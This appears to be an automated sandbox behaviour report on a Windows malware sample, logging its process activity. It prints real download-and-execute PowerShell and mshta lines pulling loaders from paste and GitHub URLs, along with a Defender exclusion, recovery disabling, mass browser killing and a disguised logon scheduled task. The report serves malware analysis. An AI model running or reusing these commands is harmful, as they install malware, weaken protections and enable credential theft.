Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\spreadmalware.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'

Bypasses PowerShell execution policy

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'

Excessive usage of taskkill to terminate processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM firefox.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM brave.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM opera.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM kometa.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM orbitum.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM centbrowser.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM 7star.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM firefox.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM vivaldi.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM epicprivacybrowser.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM uran.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM yandex.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM iridium.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM kometa.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM yandex.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM brave.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM opera.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM kometa.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM orbitum.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM centbrowser.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM sputnik.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM vivaldi.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM epicprivacybrowser.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM uran.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM yandex.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM iridium.exe

Source: C:\Users\user\Desktop\spreadmalware.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell "iwr https://pastejustit.com/raw/msdcgy3bxg \| iex"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "iwr https://pastejustit.com/raw/msdcgy3bxg \| iex"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\runtime.bat" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\AppData\Roaming\runtime.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo \\user-PC "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i "DADDYSERVER"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\AppData\Roaming\runtime.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\AppData\Roaming\runtime.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\AppData\Roaming\runtime.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\AppData\Roaming\runtime.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\doskey.exe doskey /listsize=0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta vbscript:CreateObject("WScript.Shell").Run("powershell -command ""iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') \| iex""",0)(window.close)	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer /value	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer /value	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') \| iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m1dly232\m1dly232.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +h +s C:\ProgramData\Loader..{21EC2020-3AEA-1069-A2DD-08002B30309D}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://raw.githubusercontent.com/43a1723/test/refs/heads/main/Mewing'))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://raw.githubusercontent.com/43a1723/test/refs/heads/main/shellcode/loaderclient.ps1'))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command iwr 'https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1' \| iex
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES8ECC.tmp" "c:\Users\user\AppData\Local\Temp\m1dly232\CSC716D4489C5CC45ECB9EB6334571A58C.TMP"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1')\|iex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c2ejd4wa\c2ejd4wa.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +h +s C:\ProgramData\Loader..{21EC2020-3AEA-1069-A2DD-08002B30309D}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://raw.githubusercontent.com/43a1723/test/refs/heads/main/Mewing'))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://raw.githubusercontent.com/43a1723/test/refs/heads/main/shellcode/loaderclient.ps1'))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command iwr 'https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1' \| iex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESB485.tmp" "c:\Users\user\AppData\Local\Temp\c2ejd4wa\CSC99BE4B68E03746B880F950F6606729FB.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\ReAgentc.exe reagentc.exe /disable
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM firefox.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM brave.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM opera.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM kometa.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM orbitum.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM centbrowser.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM 7star.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM firefox.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM vivaldi.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM epicprivacybrowser.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM uran.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM yandex.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM iridium.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM kometa.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM yandex.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM brave.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM opera.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM kometa.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM orbitum.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM centbrowser.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM sputnik.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM vivaldi.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM epicprivacybrowser.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM uran.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM yandex.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM iridium.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Microsoft Defender Threat Intelligence Handler" /sc ONLOGON /tr C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe /rl HIGHEST
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESB485.tmp" "c:\Users\user\AppData\Local\Temp\c2ejd4wa\CSC99BE4B68E03746B880F950F6606729FB.TMP"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM firefox.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM brave.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM opera.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM kometa.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM orbitum.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM centbrowser.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM 7star.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM firefox.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM vivaldi.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM epicprivacybrowser.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM uran.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM yandex.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM iridium.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM kometa.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM yandex.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM brave.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM opera.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM kometa.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM orbitum.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM centbrowser.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM sputnik.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM vivaldi.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM epicprivacybrowser.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM uran.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM yandex.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM iridium.exe

Source: C:\Users\user\Desktop\spreadmalware.exe	Queries volume information: C:\Users\user\Desktop\spreadmalware.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
